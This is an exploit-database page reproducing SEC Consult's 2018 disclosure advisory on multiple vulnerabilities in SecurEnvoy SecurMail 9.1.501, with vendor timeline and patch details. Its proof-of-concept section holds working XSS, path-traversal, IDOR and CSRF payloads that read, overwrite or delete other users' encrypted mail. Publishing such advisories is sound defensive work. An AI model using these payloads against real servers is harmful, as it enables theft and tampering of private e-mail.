Menu

Improved exploit search engine. Try it out

"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities"

Author

"SEC Consult"

Platform

aspx

Release date

2018-03-13

Release Date Title Type Platform Author
2019-07-11 "Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting" webapps aspx "Owais Mehtab"
2019-06-25 "BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal" webapps aspx "Aaron Bishop"
2019-06-20 "BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection" webapps aspx "Aaron Bishop"
2019-06-19 "BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution" webapps aspx "Aaron Bishop"
2019-06-19 "BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution" webapps aspx "Aaron Bishop"
2019-06-13 "Sitecore 8.x - Deserialization Remote Code Execution" webapps aspx "Jarad Kopf"
2019-02-12 "BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution" webapps aspx "Dustin Cobb"
2019-01-14 "Umbraco CMS 7.12.4 - Authenticated Remote Code Execution" webapps aspx "Gregory Draperi"
2017-05-05 "Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure" webapps aspx "Usman Saeed"
2018-10-29 "Library Management System 1.0 - 'frmListBooks' SQL Injection" webapps aspx "Ihsan Sencan"
2018-10-24 "Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting" webapps aspx "Dino Barlattani"
2018-10-10 "Ektron CMS 9.20 SP2 - Improper Access Restrictions" webapps aspx alt3kx
2018-08-06 "Sitecore.Net 8.1 - Directory Traversal" webapps aspx Chris
2018-06-04 "EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting" webapps aspx "Chris Barretto"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2017-09-27 "SmarterStats 11.3.6347 - Cross-Site Scripting" webapps aspx sqlhacker
2017-09-13 "ICEstate 1.1 - 'id' SQL Injection" webapps aspx "Ihsan Sencan"
2017-06-14 "KBVault MySQL 0.16a - Arbitrary File Upload" webapps aspx "Fatih Emiral"
2017-05-09 "Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions" webapps aspx "Pesach Zirkind"
2017-05-09 "Personify360 7.5.2/7.6.1 - Improper Access Restrictions" webapps aspx "Pesach Zirkind"
2018-02-02 "IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting" webapps aspx 1n3
2017-12-27 "DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)" webapps aspx "Glafkos Charalambous"
2017-03-15 "Sitecore CMS 8.1 Update-3 - Cross-Site Scripting" webapps aspx "Pralhad Chaskar"
2017-01-17 "Check Box 2016 Q2 Survey - Multiple Vulnerabilities" webapps aspx "Fady Mohammed Osman"
2018-01-24 "Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload" webapps aspx "Paul Taylor"
2018-01-24 "Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure" webapps aspx "Paul Taylor"
2016-09-22 "Microix Timesheet Module - SQL Injection" webapps aspx "Anthony Cole"
2016-09-19 "MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities" webapps aspx "Paul Baade & Sven Krewitt"
2017-11-16 "LanSweeper 6.0.100.75 - Cross-Site Scripting" webapps aspx "Miguel Mendez Z"
Release Date Title Type Platform Author
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2018-08-16 "Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "SEC Consult"
2018-07-13 "Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure" webapps php "SEC Consult"
2018-07-13 "WAGO e!DISPLAY 7300T - Multiple Vulnerabilities" webapps php "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2018-03-05 "ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection" webapps php "SEC Consult"
2017-12-07 "OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting" webapps php "SEC Consult"
2017-10-18 "Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities" webapps php "SEC Consult"
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-05-09 "I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting" webapps php "SEC Consult"
2017-03-22 "Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-03-01 "Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting" webapps xml "SEC Consult"
2016-10-11 "RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection" webapps xml "SEC Consult"
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-02-10 "Yeager CMS 1.2.1 - Multiple Vulnerabilities" webapps php "SEC Consult"
2015-12-10 "Skybox Platform < 7.0.611 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-06-30 "Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-14 "Ansible Tower 2.0.2 - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2014-12-23 "NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-11-06 "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-07-16 "BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities" webapps linux "SEC Consult"
2014-07-14 "Shopizer 1.1.5 - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-07-01 "IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-06-09 "WebTitan 4.01 (Build 68) - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-04-24 "WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion" webapps php "SEC Consult"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/44285/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/44285/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/44285/39588/securenvoy-securmail-91501-multiple-vulnerabilities/download/", "exploit_id": "44285", "exploit_description": "\"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities\"", "exploit_date": "2018-03-13", "exploit_author": "\"SEC Consult\"", "exploit_type": "webapps", "exploit_platform": "aspx", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
=======================================================================
              title: Multiple Critical Vulnerabilities
            product: SecurEnvoy SecurMail
 vulnerable version: 9.1.501
      fixed version: 9.2.501 or hotfix patch "1_012018"
         CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704,
                     CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
             impact: Critical
           homepage: https://www.securenvoy.com/
              found: 2017-11
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Sending and receiving encrypted emails is not an easy or simple experience.
Businesses rely on email with an increasing amount of sensitive data sent across
their networks. A revolutionary approach that doesn't suffer from the overheads
of deployment and encryption management; just rock-solid security to give you
100% confidence in your business communications."

URL: https://www.securenvoy.com/products/securmail/key-features.shtm


Business recommendation:
------------------------
During a brief crash test of the SecurEnvoy SecurMail application several severe
vulnerabilities have been identified that break the core security promises of
the product.

These vulnerabilities open the possibility for several different attack
scenarios that allow an attacker to read other users' encrypted e-mails and
overwrite or delete e-mails stored in other users' inboxes.

As we have identified several critical vulnerabilities within a very short time
frame we expect numerous other vulnerabilities to be present.

As other SecureEnvoy products (besides the analyzed SecurMail) appear
to be highly integrated (all products are installed with a single setup
file) we suspect other components to also suffer from severe security deficits.

We recommend not to use SecurEnvoy products (especially SecurMail) in a
production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.


Vulnerability overview/description:
-----------------------------------
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating
HTML pages. Therefore persistent and reflected cross site scripting attacks are
possible throughout the application.

Some pages fail to properly decode URL encoded parameters. Because of this, cross
site scripting cannot be exploited on these pages in most browsers.


2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application.
Since the application uses encrypted files as the primary method of data
storage, this vulnerability can be exploited at several points.

Using this vulnerability, a legitimate recipient can read mails sent to other
recipients in plain text!


3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate
recipient to read mails sent to other users in plain text.


4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the
SecurEnvoy server. Therefore anyone with network access to the server can
arbitrarily send e-mails that appear to come from an arbitrary sender address.

Moreover, an attacker with network access to the server can re-send previous
communication to arbitrary recipients. This allows him/her to extract all
e-mails stored on the server. An attacker could also modify arbitrary messages
stored on the server.


5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An
attacker could use this vulnerability to delete a victim's e-mail or to
impersonate the victim and reply to his/her e-mails.


Since these vulnerabilities were found during a very short time frame, SEC
Consult believes that the product may contain a large number of other security
vulnerabilities. As already several core security promises have been broken
during this short crash test, no further tests were conducted.


Proof of concept:
-----------------
1) Cross Site Scripting
a) The following HTML fragments demonstrates reflected cross site scripting
   (CVE-2018-7703):

--- snip ---
<form action="http://<host>/secmail/getmessage.exe" method="POST"
    enctype="text/plain">
  <input type="hidden" name="mailboxid"

value=""><script>alert&#40;&apos;xss&apos;&#41;<&#47;script>" />
  <input type="submit" value="Submit request" />
</form>
--- snip ---

b) E-mails that are sent using the HTML format can contain any <script> tags
   (CVE-2018-7707). These are executed once the victim opens the message in the
   web interface.


2) Path Traversal
a) The following request demonstrates how the message body of the e-mail with id
   107 can be overwritten while uploading the body for message 103. The message
   IDs can easily be guessed since they are assigned sequentially
   (CVE-2018-7705).

--- snip---
POST /secupload2/upload.aspx HTTP/1.1
Host: <host>
Content-Type: multipart/form-data; boundary=--------822119548
Content-Length: 309

----------822119548
Content-Disposition: form-data; name="FileName"

x
----------822119548
Content-Disposition: form-data; name="MessageID"

103
----------822119548
Content-Disposition: form-data; filename="../107/BODY"
Content-Type: application/octet-stream

some message
----------822119548--
--- snip ---

b) The following link demonstrates how the message body of the e-mail with id
   107 can be retrieved while only having access to the mail with id 103
   (CVE-2018-7706):

http://<host>/secmail/getmessage.exe?mailboxid=<mailbox-id>&action=attachment&option1=103&option2=../107/BODY


3) Insecure Direct Object Reference (CVE-2018-7704)
The functionality that allows a recipient to read an e-mail checks whether the
user is actually authorized to read the requested e-mail. However, by using the
functionality that allows a user to reply to an e-mail, an attacker can
manipulate the id that is sent as a URL parameter to read arbitrary e-mails.
The following link demonstrates the retrieval of the message with id 103. The
message id can easily be guessed since they are assigned sequentially.

http://<host>/secmail/getmessage.exe?mailboxid=<mailboxid>&action=reply&option1=103


4) Missing Authorization (CVE-2018-7702)
In order to send an e-mail to a recipient the following requests have to be
made:
 1. Execute a GETINFO request in order to request a message id.
 2. Upload the message body and the attachments.
 3. Execute a STORE request to send the message to the recipients.

Neither of these requests require any authentication. Therefore, also no
authorization is made. Attack scenarios include:
a) Extract any message by executing step #3 while specifying an own e-mail
   address as recipient and the message id to extract.
b) Overwrite attachments or message bodies of previously sent e-mails by
   executing step #2 to upload arbitrary content.


5) Cross-Site Request Forgery
SEC Consult did not find any CSRF protection within the web interface. Moreover,
CSRF attacks are possible against the API used to send e-mails. Since this API
does not require authentication, being authenticated on the server is not a
precondition for a successful attack. Instead, the attack exploits the victim's
network location.

a) The following link demonstrates how e-mails can be deleted using a CSRF
   attack (CVE-2018-7701):

http://<host>/secmail/getmessage.exe?mailboxid=<mailboxid>&action=delete&option1=103

b) The following HTML fragment demonstrates how the API can be exploited to send
   an e-mail with an arbitrary message id to an arbitrary recipient (also
   CVE-2018-7702):

<form action="http://<host>/secserver/securectrl.exe" method="POST"
    enctype="text/plain">
 <input type="hidden"
 name="FLAG&#58;STORE&#13;&#10;VERSION&#58;1&#46;0&#13;&#10;RECIPIENT&#95;MOBILE&#95;LIST&#58;SMTP" value="bob&#64;local&#58;MOBILE&#61;00000&#13;&#10;SENDER&#58;me&#64;local&#13;&#10;RECORDED&#95;DELIVERY&#58;&#13;&#10;SUBJECTB64&#58;AAAA&#13;&#10;MESSAGEID&#58;108&#13;&#10;SENDERMOBILE&#58;000000&#13;&#10;REPLY&#58;False" />
 <input type="submit" value="Submit request" />
</form>


Vulnerable / tested versions:
-----------------------------
The version 9.1.501 was found to be vulnerable. This was the latest version at
the time of discovery.


Vendor contact timeline:
------------------------
2017-11-20: Contacting vendor through info <at> securenvoy <dot> com
2017-11-21: SecureEnvoy requests to upload advisory through their SecurMail
            instance
2017-11-22: Uploading advisory to SecurEnvoy's SecurMail instance
2017-12-13: SecurEnvoy: engineering team is investigating issues;
            product will be re-engineered; asked for deadline extension until
            revised software is available
2017-11-15: Postponing advisory release to 2017-02-21
2018-01-22: SecurEnvoy sends release notes document for the security patch
            "1_012018"; Fixed vulnerabilities: Path traversal, Insecure Direct
            Object Reference, XSS, CSRF; SecurEnvoy instructs customers to
            configure requiring client certificates for the "secserver" endpoint
2018-02-22: Asking whether the security patch has been released
2018-03-01: Asking for status update
2018-03-01: SecurEnvoy: patch has been released
2018-03-12: Releasing security advisory


Solution:
---------
Customers of SecurEnvoy should immediately apply the security patch "1_012018"
or update to version 9.2.501 of the software.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2018